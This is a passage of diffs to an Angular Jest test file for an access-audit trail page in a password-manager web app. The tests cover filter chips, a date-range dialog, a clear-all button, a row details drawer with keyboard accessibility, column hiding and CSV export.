+      // Reopening has to show what the table is filtered to, or the auditor is editing bounds they cannot see.
+      it("reopens the dialog on the range in force", async () => {
+        await renderTrail([new Date(2026, 7, 18, 12, 0)]);
+        closesWith({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+
+        await chooseCustom();
+        selectFilter("timePeriod", null);
+        await chooseCustom();
+
+        expect(dialogService.open).toHaveBeenLastCalledWith(expect.anything(), {
+          data: { from: "2026-08-18T09:00", to: "2026-08-18T17:00" },
+        });
+      });
+
+      // A cancelled dialog that left "Custom" showing would claim a range the table is not filtered to.
+      it("rolls the chip back to the period in force when cancelled", async () => {
+        const recent = new Date(now().getTime() - HOUR_MS);
+        const older = new Date(now().getTime() - 40 * DAY_MS);
+        await renderTrail([recent, older]);
+        selectFilter("timePeriod", "past7Days");
+        closesWith(undefined);
+
+        await chooseCustom();
+
+        expect(component().selectedPeriod()).toBe("past7Days");
+        expect(occurredAt()).toEqual([recent.getTime()]);
+      });
+
+      it("leaves the chip unselected when cancelled from no selection at all", async () => {
+        await renderTrail([new Date(now().getTime() - HOUR_MS)]);
+        closesWith(undefined);
+
+        await chooseCustom();
+
+        expect(component().selectedPeriod()).toBeNull();
+        expect(component().filteredRows()).toHaveLength(1);
+      });
+    });
   });
 
-  it("leaves the table alone and reports an inverted range on the To field rather than emptying it", async () => {
-    auditApiService.listAccessAuditTrail.mockResolvedValue([event(), event()]);
+  describe("clear all", () => {
+    const clearAllButton = () =>
+      fixture.nativeElement.querySelector("#access-audit_button_clear-all");
 
-    fixture.detectChanges();
-    await fixture.whenStable();
-    fixture.detectChanges();
+    /** Stamped against the real clock, so the time-period chip has something inside its preset window. */
+    const anHourAgo = () => new Date(Date.now() - 60 * 60 * 1000).toISOString();
 
-    component().fromControl.setValue("2026-08-18T18:00");
-    component().toControl.setValue("2026-08-18T09:00");
-    fixture.detectChanges();
+    const renderReady = async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event({ OccurredAt: anHourAgo(), ActorId: "user-1", ActorName: "Ada" }),
+        event({
+          OccurredAt: anHourAgo(),
+          Kind: "leaseActivated",
+          ActorId: "user-3",
+          ActorName: "Linus",
+        }),
+      ]);
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
 
-    expect(component().invertedRange()).toBe(true);
-    expect(component().filteredRows()).toHaveLength(2);
+    it("stays out of the chip row while nothing is filtering the table", async () => {
+      await renderReady();
 
-    const toInput = fixture.nativeElement.querySelector("#access-audit_input_to");
-    const fromInput = fixture.nativeElement.querySelector("#access-audit_input_from");
-    expect(toInput.closest("bit-form-field").querySelector("bit-error").textContent).toContain(
-      "Invalid date range.",
-    );
-    expect(toInput.getAttribute("aria-invalid")).toBe("true");
-    expect(fromInput.getAttribute("aria-invalid")).not.toBe("true");
-  });
+      expect(clearAllButton()).toBeNull();
+    });
 
-  it("clears the inverted-range error once the bounds are the right way round", async () => {
-    auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+    it("appears as soon as one chip has a selection", async () => {
+      await renderReady();
 
-    fixture.detectChanges();
-    await fixture.whenStable();
-    fixture.detectChanges();
+      selectFilter("actor", "user-3");
 
-    component().fromControl.setValue("2026-08-01T00:00");
-    component().toControl.setValue("2026-07-01T00:00");
-    fixture.detectChanges();
+      expect(clearAllButton()).not.toBeNull();
+    });
 
-    component().toControl.setValue("2026-09-01T00:00");
-    fixture.detectChanges();
+    it("resets every chip at once", async () => {
+      await renderReady();
+      selectFilter("kind", "pamAuditKindRequestApproved");
+      selectFilter("actor", "user-1");
+      selectFilter("requester", "user-2");
+      selectFilter("timePeriod", "past7Days");
+      expect(component().filteredRows()).toHaveLength(1);
 
-    const toInput = fixture.nativeElement.querySelector("#access-audit_input_to");
-    expect(toInput.closest("bit-form-field").querySelector("bit-error")).toBeNull();
-    expect(toInput.getAttribute("aria-invalid")).not.toBe("true");
-    expect(component().toControl.errors).toBeNull();
+      clearAllButton().click();
+      fixture.detectChanges();
+
+      expect(
+        component()
+          .chips()
+          .some((chip: any) => chip.active()),
+      ).toBe(false);
+      expect(component().selectedPeriod()).toBeNull();
+      expect(component().filteredRows()).toHaveLength(2);
+      expect(clearAllButton()).toBeNull();
+    });
   });
 
   // Every filter is a predicate over the one already-fetched window; the endpoint takes no query
@@ -512,8 +636,7 @@ describe("AccessAuditComponent", () => {
     selectFilter("kind", "pamAuditKindLeaseActivated");
     selectFilter("actor", "user-1");
     selectFilter("requester", "user-2");
-    component().fromControl.setValue("2026-08-18T00:00");
-    component().toControl.setValue("2026-08-19T00:00");
+    selectFilter("timePeriod", "past30Days");
     fixture.detectChanges();
     await fixture.whenStable();
 
@@ -647,38 +770,42 @@ describe("AccessAuditComponent", () => {
       return fixture.nativeElement.querySelector("#access-audit_container_toolbar") as HTMLElement;
     };
 
-    it("renders every control in one row", async () => {
+    it("filters from four chips of the same family", async () => {
       const toolbar = await renderToolbar();
 
       expect(toolbar).not.toBeNull();
-      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(3);
-      for (const control of [
-        "#access-audit_input_from",
-        "#access-audit_input_to",
-        "#access-audit_button_refresh",
-        "#access-audit_button_export",
-      ]) {
-        expect(toolbar.querySelector(control)).not.toBeNull();
-      }
+      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(4);
+      expect(toolbar.querySelector("bit-form-field")).toBeNull();
+      expect(toolbar.querySelector("input[type=datetime-local]")).toBeNull();
     });
 
-    // The date inputs are taller than a chip or a button by the height of their label, so everything
-    // beside them carries the same offset the event log uses; without it the row sits ragged.
-    it("offsets the controls that have no label so they line up with the date inputs", async () => {
+    // A long chip label wraps the chip row. The buttons sit above it so that wrap can never orphan
+    // Export onto a line of its own.
+    it("keeps the actions out of the wrapping row, right-aligned above it", async () => {
       const toolbar = await renderToolbar();
 
-      const chips = toolbar.querySelector("bit-filter-menu")!.parentElement!;
-      expect(chips.classList).toContain("tw-mt-7");
+      const actions = toolbar.querySelector("#access-audit_container_actions")!;
+      const filters = toolbar.querySelector("#access-audit_container_filters")!;
+      expect(actions.classList).toContain("tw-justify-end");
       for (const button of ["#access-audit_button_refresh", "#access-audit_button_export"]) {
-        expect(toolbar.querySelector(button)!.classList).toContain("tw-mt-7");
+        expect(actions.querySelector(button)).not.toBeNull();
+        expect(filters.querySelector(button)).toBeNull();
       }
     });
 
-    it("wraps the row rather than overflowing it", async () => {
+    // Four chips of one height need no vertical nudge; the offsets existed only to line them up with
+    // the labelled date fields that are now in the dialog.
+    it("carries no height nudges", async () => {
       const toolbar = await renderToolbar();
 
-      expect(toolbar.classList).toContain("tw-flex-wrap");
-      expect(toolbar.querySelector("bit-filter-menu")!.parentElement!.classList).toContain(
+      expect(toolbar.querySelectorAll(".tw-mt-7")).toHaveLength(0);
+      expect(toolbar.querySelectorAll(".tw-ms-auto")).toHaveLength(0);
+    });
+
+    it("wraps the chip row rather than overflowing it", async () => {
+      const toolbar = await renderToolbar();
+
+      expect(toolbar.querySelector("#access-audit_container_filters")!.classList).toContain(
         "tw-flex-wrap",
       );
     });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -553,6 +553,22 @@ describe("AccessAuditComponent", () => {
       expect(component().status()).toBe("ready");
     });
 
+    // An organization whose first PAM event has not landed yet renders the empty state, which holds no
+    // toolbar. Without Update there, the only way to see that first event is a browser reload.
+    it("re-reads the trail from the empty state", async () => {
+      await renderReady([]);
+      expect(component().status()).toBe("empty");
+
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+      clickUpdate();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(2);
+      expect(component().status()).toBe("ready");
+      expect(component().rows()).toHaveLength(1);
+    });
+
     it("re-reads the member lookup alongside the trail", async () => {
       await renderReady();
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -903,37 +903,6 @@ describe("AccessAuditComponent", () => {
       expect(navigateByUrl).not.toHaveBeenCalled();
     });
 
-    // AccessEventLogs authorizes this trail but does not imply permission to enumerate members, so a
-    // refused lookup is an ordinary outcome for a legitimate viewer — not a reason to fail the page.
-    it("renders the whole trail with nothing linked when the member lookup fails", async () => {
-      organizationUserApiService.getAllMiniUserDetails.mockRejectedValue(new Error("forbidden"));
-      resolveCipherName("cipher-1", "Prod database");
-
-      await expect(
-        render([
-          event({ ActorId: "user-1", ActorName: "Ada" }),
-          event({ CipherId: "cipher-1", CollectionId: "col-1" }),
-        ]),
-      ).resolves.not.toThrow();
-
-      expect(component().status()).toBe("ready");
-      expect(component().rows()).toHaveLength(2);
-      expect(link("actor")).toBeNull();
-      expect(link("requester")).toBeNull();
-      expect(cells()[2].textContent).toContain("Ada");
-      expect(TestBed.inject(LogService).error).toHaveBeenCalled();
-    });
-
-    // The cipher link is resolved from local vault state, not from the member lookup, so it survives.
-    it("still links the item when only the member lookup failed", async () => {
-      organizationUserApiService.getAllMiniUserDetails.mockRejectedValue(new Error("forbidden"));
-      resolveCipherName("cipher-1", "Prod database");
-
-      await render([event({ CipherId: "cipher-1", CollectionId: "col-1" })]);
-
-      expect(link("item")).not.toBeNull();
-    });
-
     it("reads the member lookup once per load, not once per row", async () => {
       await render([event(), event(), event()]);
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1399,6 +1399,172 @@ describe("AccessAuditComponent", () => {
     });
   });
 
+  describe("details drawer", () => {
+    const render = async (events: AccessAuditEventResponse[]) => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue(events);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const rows = (): HTMLElement[] =>
+      Array.from(fixture.nativeElement.querySelectorAll("bit-table tbody tr"));
+
+    const activator = (index = 0): HTMLElement =>
+      fixture.nativeElement.querySelector(`#access-audit_button_details-${index}`);
+
+    /** The params the one opened drawer was configured with. */
+    const drawerData = () =>
+      (dialogService.openDrawer.mock.calls[0][1] as { data: Record<string, any> }).data;
+
+    const press = (element: HTMLElement, key: string): KeyboardEvent => {
+      const keydown = new KeyboardEvent("keydown", { key, bubbles: true, cancelable: true });
+      element.dispatchEvent(keydown);
+      fixture.detectChanges();
+      return keydown;
+    };
+
+    it("opens the drawer over the row that was activated", async () => {
+      await render([
+        event({ OccurredAt: "2026-08-18T09:00:00.000Z", Detail: "first" }),
+        event({ OccurredAt: "2026-08-18T08:00:00.000Z", Detail: "second" }),
+      ]);
+
+      rows()[1].click();
+
+      expect(dialogService.openDrawer).toHaveBeenCalledTimes(1);
+      expect(drawerData().row.detail).toBe("second");
+      expect(drawerData().organizationId).toBe(ORGANIZATION_ID);
+    });
+
+    // The member lookup ran once for the whole trail; the pane must link exactly what the row under
+    // it links, which it can only do if the page hands over the answer it already has.
+    it("hands the drawer the identities the row resolved", async () => {
+      await render([event({ ActorId: "user-1", RequesterId: "user-2" })]);
+
+      rows()[0].click();
+
+      expect(drawerData().actor).toEqual({
+        name: "Ada",
+        email: "ada@example.com",
+        organizationUserId: "org-user-1",
+      });
+      expect(drawerData().requester.organizationUserId).toBe("org-user-2");
+    });
+
+    it("hands the drawer no actor for an automated row", async () => {
+      await render([event({ Automated: true })]);
+
+      rows()[0].click();
+
+      expect(drawerData().actor).toBeNull();
+    });
+
+    it("leaves an identity the member lookup did not resolve unlinked in the drawer", async () => {
+      await render([event({ ActorId: "user-9", ActorName: "Linus", RequesterId: "user-9" })]);
+
+      rows()[0].click();
+
+      expect(drawerData().actor).toBeNull();
+      expect(drawerData().requester).toBeNull();
+    });
+
+    // An anchor inside the row already opens something of its own. Letting the click reach the row
+    // as well would stack a drawer behind the dialog the auditor actually asked for.
+    it.each([
+      ["actor", { ActorId: "user-1", ActorName: "Ada" }],
+      ["requester", { RequesterId: "user-2", RequesterName: "Grace" }],
+    ])("opens only the entity dialog from the %s link", async (name, overrides) => {
+      await render([event(overrides)]);
+
+      fixture.nativeElement.querySelector(`#access-audit_link_${name}-0`).click();
+
+      expect(dialogService.open).toHaveBeenCalledTimes(1);
+      expect(dialogService.openDrawer).not.toHaveBeenCalled();
+    });
+
+    it("opens only the entity dialog from the item link", async () => {
+      nameResolver.resolveNames.mockResolvedValue({
+        ...emptyResolvedNames(),
+        cipherNameById: new Map([["cipher-1", "Prod database"]]),
+      });
+      await render([event({ CipherId: "cipher-1", CollectionId: "col-1" })]);
+
+      fixture.nativeElement.querySelector("#access-audit_link_item-0").click();
+
+      expect(dialogService.open).toHaveBeenCalledTimes(1);
+      expect(dialogService.openDrawer).not.toHaveBeenCalled();
+    });
+
+    // A `tr` is neither focusable nor nameable, so the affordance lives on a cell — one cell, not
+    // six, or a ninety-day trail would put hundreds of tab stops between an auditor and the table's end.
+    it("gives the row one keyboard activator, with a role and a name", async () => {
+      await render([event()]);
+
+      const cell = activator();
+      expect(cell.getAttribute("role")).toBe("button");
+      expect(cell.getAttribute("tabindex")).toBe("0");
+      expect(cell.getAttribute("aria-label")).toContain("Request approved");
+      expect(cell.className).toContain("focus-visible:tw-ring-2");
+      expect(
+        fixture.nativeElement.querySelectorAll('bit-table tbody [role="button"]'),
+      ).toHaveLength(1);
+    });
+
+    it("opens the drawer on Enter", async () => {
+      await render([event()]);
+
+      press(activator(), "Enter");
+
+      expect(dialogService.openDrawer).toHaveBeenCalledTimes(1);
+    });
+
+    // Space activates the row without also scrolling the page out from under it.
+    it("opens the drawer on Space, and swallows the key", async () => {
+      await render([event()]);
+
+      const keydown = press(activator(), " ");
+
+      expect(dialogService.openDrawer).toHaveBeenCalledTimes(1);
+      expect(keydown.defaultPrevented).toBe(true);
+    });
+
+    // Pointer activation sits on the row, so the activator cell must not repeat it.
+    it("opens the drawer once when the activator itself is clicked", async () => {
+      await render([event()]);
+
+      activator().click();
+
+      expect(dialogService.openDrawer).toHaveBeenCalledTimes(1);
+    });
+
+    it("no longer gives the table a Detail column", async () => {
+      await render([event({ Detail: "Incident closed early." })]);
+
+      const headers = Array.from<HTMLElement>(
+        fixture.nativeElement.querySelectorAll("bit-table thead th"),
+      ).map((header) => header.textContent!.trim());
+      expect(headers).toEqual(["Timestamp", "Event", "Actor", "Requester", "Item", "Duration"]);
+      expect(fixture.nativeElement.querySelector("bit-table tbody").textContent).not.toContain(
+        "Incident closed early.",
+      );
+    });
+
+    // The column is gone from the TABLE, not from the trail: the file an auditor exports is the
+    // record they file, and it still has to carry the free text the column used to show.
+    it("still exports the detail the column gave up", async () => {
+      await render([event({ Detail: "Incident closed early." })]);
+
+      fixture.nativeElement.querySelector("#access-audit_button_export").click();
+
+      const csv = fileDownloadService.download.mock.calls[0][0].blobData as string;
+      const parsed = papa.parse<Record<string, string>>(csv, { header: true });
+      expect(parsed.meta.fields).toContain("detail");
+      expect(parsed.data[0].detail).toBe("Incident closed early.");
+    });
+  });
+
   describe("no matches", () => {
     const emptyStateClearAll = (): HTMLButtonElement | null =>
       fixture.nativeElement.querySelector("#access-audit_button_no-matches-clear-all");
@@ -1487,7 +1653,8 @@ describe("AccessAuditComponent", () => {
   describe("empty cells", () => {
     const ACTOR = 2;
     const REQUESTER = 3;
-    const DETAIL = 6;
+    const ITEM = 4;
+    const DURATION = 5;
 
     const render = async (events: AccessAuditEventResponse[]) => {
       auditApiService.listAccessAuditTrail.mockResolvedValue(events);
@@ -1535,18 +1702,6 @@ describe("AccessAuditComponent", () => {
       expect(text(REQUESTER)).toBe("—");
     });
 
-    it("renders the detail when the row carries one", async () => {
-      await render([event({ Detail: "Incident closed early." })]);
-
-      expect(text(DETAIL)).toBe("Incident closed early.");
-    });
-
-    it("renders an em dash for a row with no detail", async () => {
-      await render([event({ Detail: null })]);
-
-      expect(text(DETAIL)).toBe("—");
-    });
-
     // A blank cell in an audit table reads as a rendering failure rather than as "no value".
     it("leaves no cell of a bare row blank", async () => {
       await render([
@@ -1557,11 +1712,12 @@ describe("AccessAuditComponent", () => {
           RequesterId: null,
           RequesterName: null,
           RequesterEmail: null,
-          Detail: null,
+          CipherId: null,
+          CollectionId: null,
         }),
       ]);
 
-      for (const column of [ACTOR, REQUESTER, DETAIL]) {
+      for (const column of [ACTOR, REQUESTER, ITEM, DURATION]) {
         expect(text(column)).toBe("—");
         expect(cell(column).querySelector(".tw-text-muted")).not.toBeNull();
       }
@@ -1609,13 +1765,12 @@ describe("AccessAuditComponent", () => {
   });
 
   describe("column widths", () => {
-    /** Time, Event, Actor, Requester, Item, Duration, Detail — the order the template declares. */
+    /** Timestamp, Event, Actor, Requester, Item, Duration — the order the template declares. */
     const TIME = 0;
     const EVENT = 1;
     const ACTOR = 2;
     const REQUESTER = 3;
     const ITEM = 4;
-    const DETAIL = 6;
 
     const renderTable = async () => {
       auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
@@ -1652,15 +1807,13 @@ describe("AccessAuditComponent", () => {
       expect(cells[ITEM].classList).toContain("tw-p-3");
     });
 
-    it("caps Item and Detail and lets their text break inside the cap", async () => {
+    it("caps Item and lets its text break inside the cap", async () => {
       const { headers, cells } = await renderTable();
 
-      for (const column of [ITEM, DETAIL]) {
-        expect(headers[column].classList).toContain("tw-max-w-64");
-        expect(headers[column].classList).toContain("tw-break-words");
-        expect(cells[column].classList).toContain("tw-max-w-64");
-        expect(cells[column].classList).toContain("tw-break-words");
-      }
+      expect(headers[ITEM].classList).toContain("tw-max-w-64");
+      expect(headers[ITEM].classList).toContain("tw-break-words");
+      expect(cells[ITEM].classList).toContain("tw-max-w-64");
+      expect(cells[ITEM].classList).toContain("tw-break-words");
     });
 
     it("leaves the unbounded name columns free to wrap", async () => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1550,6 +1550,15 @@ describe("AccessAuditComponent", () => {
       ).toHaveLength(1);
     });
 
+    // `button` marks its children presentational, so the badge is not exposed as a node of its own and
+    // an in-doubt row would otherwise announce exactly the same as a settled one.
+    it("names the in-doubt badge on the cell that carries the role", async () => {
+      await render([event({ Incomplete: true }), event({ Incomplete: false })]);
+
+      expect(activator(0).getAttribute("aria-label")).toContain("Incomplete");
+      expect(activator(1).getAttribute("aria-label")).not.toContain("Incomplete");
+    });
+
     it("opens the drawer on Enter", async () => {
       await render([event()]);
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -143,6 +143,7 @@ describe("AccessAuditComponent", () => {
             pamAuditKindRuleCreated: "Access rule created",
             pamAuditKindLeaseRevoked: "Lease revoked",
             pamAuditKindLeaseEndedByHolder: "Lease ended by holder",
+            pamAuditKindRuleUpdated: "Access rule updated",
             exportVerb: "Export",
             update: "Update",
             close: "Close",
@@ -187,7 +188,10 @@ describe("AccessAuditComponent", () => {
    * `bit-filter-menu` owns its own selection — there is no form control to set — and the chips only
    * exist once the ready branch has rendered.
    */
-  const selectFilter = (chip: "kind" | "actor" | "requester" | "timePeriod", value: unknown) => {
+  const selectFilter = (
+    chip: "kind" | "actor" | "requester" | "item" | "timePeriod",
+    value: unknown,
+  ) => {
     fixture.detectChanges();
     component()[`${chip}Chip`]().setValue(value);
     fixture.detectChanges();
@@ -638,6 +642,126 @@ describe("AccessAuditComponent", () => {
     });
   });
 
+  describe("item filter", () => {
+    /** The Item cell renders locally-decrypted cipher names, so the chip's options follow the resolver. */
+    const withCiphers = (names: [string, string][]) => {
+      nameResolver.resolveNames.mockResolvedValue({
+        ...emptyResolvedNames(),
+        cipherNameById: new Map(names),
+      });
+    };
+
+    const render = async (events: AccessAuditEventResponse[]) => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue(events);
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    it("offers one option per item, labelled the way the Item cell labels it", async () => {
+      withCiphers([
+        ["cipher-1", "Prod database"],
+        ["cipher-2", "Staging database"],
+      ]);
+      await render([
+        event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        event({ CipherId: "cipher-2", CollectionId: "col-2" }),
+        event({
+          Kind: "ruleUpdated",
+          CipherId: null,
+          CollectionId: null,
+          RuleId: "rule-1",
+          RuleName: "Production access",
+        }),
+      ]);
+
+      expect(component().itemOptions()).toEqual([
+        { label: "Prod database", value: "cipher-1" },
+        { label: "Production access", value: "rule-1" },
+        { label: "Staging database", value: "cipher-2" },
+      ]);
+    });
+
+    // The cell renders an em dash for these, and an option that narrowed the table to "no item" would be
+    // an option with no name to put on it.
+    it("offers no option for a row naming no item at all", async () => {
+      await render([event({ CipherId: null, CollectionId: null, RuleId: null, RuleName: null })]);
+
+      expect(component().itemOptions()).toEqual([]);
+    });
+
+    // Same rule the Actor chip follows for a member it cannot resolve: no label, so no option.
+    it("offers no option for a cipher this viewer's vault could not decrypt", async () => {
+      withCiphers([["cipher-1", "Prod database"]]);
+      await render([
+        event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        event({ CipherId: "cipher-9", CollectionId: "col-9" }),
+      ]);
+
+      expect(component().itemOptions()).toEqual([{ label: "Prod database", value: "cipher-1" }]);
+    });
+
+    it("filters the trail to the selected item", async () => {
+      withCiphers([
+        ["cipher-1", "Prod database"],
+        ["cipher-2", "Staging database"],
+      ]);
+      await render([
+        event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        event({ CipherId: "cipher-2", CollectionId: "col-2" }),
+      ]);
+
+      selectFilter("item", ["cipher-1"]);
+
+      expect(component().filteredRows()).toHaveLength(1);
+      expect(component().filteredRows()[0].cipherName).toBe("Prod database");
+    });
+
+    // Two access rules can carry the same name; filtering on the id keeps their histories apart.
+    it("keeps two rules that share a name apart", async () => {
+      await render([
+        event({
+          Kind: "ruleUpdated",
+          CipherId: null,
+          CollectionId: null,
+          RuleId: "rule-1",
+          RuleName: "Approval required",
+        }),
+        event({
+          Kind: "ruleUpdated",
+          CipherId: null,
+          CollectionId: null,
+          RuleId: "rule-2",
+          RuleName: "Approval required",
+        }),
+      ]);
+
+      expect(component().itemOptions()).toEqual([
+        { label: "Approval required", value: "rule-1" },
+        { label: "Approval required", value: "rule-2" },
+      ]);
+
+      selectFilter("item", ["rule-2"]);
+
+      expect(component().filteredRows()).toHaveLength(1);
+      expect(component().filteredRows()[0].ruleId).toBe("rule-2");
+    });
+
+    it("drops a row that names no item once an item is selected", async () => {
+      withCiphers([["cipher-1", "Prod database"]]);
+      await render([
+        event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        event({ CipherId: null, CollectionId: null, RuleId: null, RuleName: null }),
+      ]);
+
+      selectFilter("item", ["cipher-1"]);
+
+      expect(component().filteredRows()).toHaveLength(1);
+      expect(component().filteredRows()[0].cipherName).toBe("Prod database");
+    });
+  });
+
   describe("clear all", () => {
     const clearAllButton = () =>
       fixture.nativeElement.querySelector("#access-audit_button_clear-all");
@@ -846,11 +970,11 @@ describe("AccessAuditComponent", () => {
       return fixture.nativeElement.querySelector("#access-audit_container_toolbar") as HTMLElement;
     };
 
-    it("filters from four chips of the same family", async () => {
+    it("filters from five chips of the same family", async () => {
       const toolbar = await renderToolbar();
 
       expect(toolbar).not.toBeNull();
-      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(4);
+      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(5);
       expect(toolbar.querySelector("bit-form-field")).toBeNull();
       expect(toolbar.querySelector("input[type=datetime-local]")).toBeNull();
     });
@@ -883,8 +1007,8 @@ describe("AccessAuditComponent", () => {
       const toolbar = await renderToolbar();
 
       const chips = [...toolbar.querySelectorAll("bit-filter-menu")];
-      expect(chips).toHaveLength(4);
-      expect(chips.filter((chip) => chip.hasAttribute("multiple"))).toHaveLength(3);
+      expect(chips).toHaveLength(5);
+      expect(chips.filter((chip) => chip.hasAttribute("multiple"))).toHaveLength(4);
 
       const timePeriod = chips.find((chip) =>
         chip.querySelector("button")?.getAttribute("title")?.startsWith("Time period"),

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -5,7 +5,7 @@ import { By } from "@angular/platform-browser";
 import { ActivatedRoute, Router, provideRouter } from "@angular/router";
 import { mock, MockProxy } from "jest-mock-extended";
 import * as papa from "papaparse";
-import { of } from "rxjs";
+import { Subject, of } from "rxjs";
 
 import {
   OrganizationUserApiService,
@@ -19,6 +19,7 @@ import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.servic
 import { LogService } from "@bitwarden/common/platform/abstractions/log.service";
 import {
   DialogService,
+  DrawerRef,
   FilterMenuComponent,
   FilterOptionComponent,
   I18nMockService,
@@ -1869,6 +1870,222 @@ describe("AccessAuditComponent", () => {
 
       const table = fixture.nativeElement.querySelector("bit-table");
       expect(table.parentElement.classList).toContain("tw-overflow-x-auto");
+    });
+  });
+
+  /**
+   * Six columns do not fit the half-width the drawer leaves, so three of them stand down while it is
+   * open. The three that go are the three the drawer itself is already showing for the selected row.
+   */
+  describe("columns while the details drawer is open", () => {
+    const ALL_COLUMNS = ["Timestamp", "Event", "Actor", "Requester", "Item", "Duration"];
+    const WITH_DRAWER = ["Timestamp", "Event", "Item"];
+    const STOOD_DOWN = [2, 3, 5];
+
+    /**
+     * The drawer refs the page opened, newest last.
+     *
+     * `close()` and `forceClose()` are deliberately the same emission: `DrawerRef.close()` (the X
+     * button, Escape, and `openDrawer`'s own teardown of the outgoing stack) and `_forceClose()` (a
+     * route change under `closeOnNavigation`) both push one value onto `closed` and complete it. That
+     * they converge is what lets a single subscription cover every way out of the pane.
+     */
+    type FakeDrawer = { close: () => void; forceClose: () => void };
+
+    let drawers: FakeDrawer[];
+
+    beforeEach(() => {
+      drawers = [];
+      dialogService.openDrawer.mockImplementation(() => {
+        // The real openDrawer closes the open stack before pushing the new ref, so the outgoing
+        // drawer emits on `closed` before this call has the incoming one. Mirrored here, because that
+        // ordering is the whole risk in replacing one drawer with another.
+        drawers.at(-1)?.close();
+        const closed = new Subject<unknown>();
+        const emit = () => {
+          closed.next(undefined);
+          closed.complete();
+        };
+        drawers.push({ close: emit, forceClose: emit });
+        return Promise.resolve({ closed: closed.asObservable() } as unknown as DrawerRef);
+      });
+    });
+
+    const render = async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event({ OccurredAt: "2026-08-18T09:00:00.000Z" }),
+        event({ OccurredAt: "2026-08-18T08:00:00.000Z" }),
+      ]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const openRow = async (index = 0) => {
+      const rows: HTMLElement[] = Array.from(
+        fixture.nativeElement.querySelectorAll("bit-table tbody tr"),
+      );
+      rows[index].click();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const settle = async () => {
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const headers = (): HTMLElement[] =>
+      Array.from(fixture.nativeElement.querySelectorAll("bit-table thead th"));
+
+    const bodyRows = (): HTMLElement[] =>
+      Array.from(fixture.nativeElement.querySelectorAll("bit-table tbody tr"));
+
+    const hidden = (element: HTMLElement) => element.classList.contains("tw-hidden");
+
+    const visibleColumns = () =>
+      headers()
+        .filter((header) => !hidden(header))
+        .map((header) => header.textContent!.trim());
+
+    it("keeps all six columns while no drawer is open", async () => {
+      await render();
+
+      expect(visibleColumns()).toEqual(ALL_COLUMNS);
+      expect(headers().filter(hidden)).toHaveLength(0);
+    });
+
+    it("stands Actor, Requester and Duration down once the drawer opens", async () => {
+      await render();
+      await openRow();
+
+      expect(component().detailsOpen()).toBe(true);
+      expect(visibleColumns()).toEqual(WITH_DRAWER);
+    });
+
+    // Hidden, not removed: a column dropped from the DOM would re-flow the table and, if the header
+    // and the cells ever disagreed about which one went, silently shift every value one column over.
+    it("leaves the stood-down columns in the DOM, header and cells together", async () => {
+      await render();
+      await openRow();
+
+      expect(headers()).toHaveLength(6);
+      const hiddenHeaders = headers().flatMap((header, index) => (hidden(header) ? [index] : []));
+      expect(hiddenHeaders).toEqual(STOOD_DOWN);
+
+      for (const row of bodyRows()) {
+        const cells: HTMLElement[] = Array.from(row.querySelectorAll("td"));
+        expect(cells).toHaveLength(6);
+        expect(cells.flatMap((cell, index) => (hidden(cell) ? [index] : []))).toEqual(STOOD_DOWN);
+      }
+    });
+
+    // The Actor and Requester anchors are unreachable while their columns are down, which is fine —
+    // the drawer offers the same links. What is not fine is a cell that is invisible but still read
+    // out and still focusable. `tw-hidden` is `display: none`, which takes the subtree out of the
+    // accessibility tree and out of the tab order; a visibility or opacity class would not.
+    it("takes the stood-down cells out of the accessibility tree, not just out of view", async () => {
+      await render();
+      await openRow();
+
+      for (const index of STOOD_DOWN) {
+        const cell = bodyRows()[0].querySelectorAll("td")[index];
+        expect(cell.classList).toContain("tw-hidden");
+        for (const seen of ["tw-invisible", "tw-opacity-0", "tw-sr-only", "tw-w-0"]) {
+          expect(cell.classList).not.toContain(seen);
+        }
+      }
+    });
+
+    // bitCell sets `class` through a HostBinding; the toggled class has to merge with that rather
+    // than replace it, or the padding goes with the column.
+    it("keeps the bitCell padding and the Item bounds under the toggle", async () => {
+      await render();
+      await openRow();
+
+      const item = bodyRows()[0].querySelectorAll("td")[4];
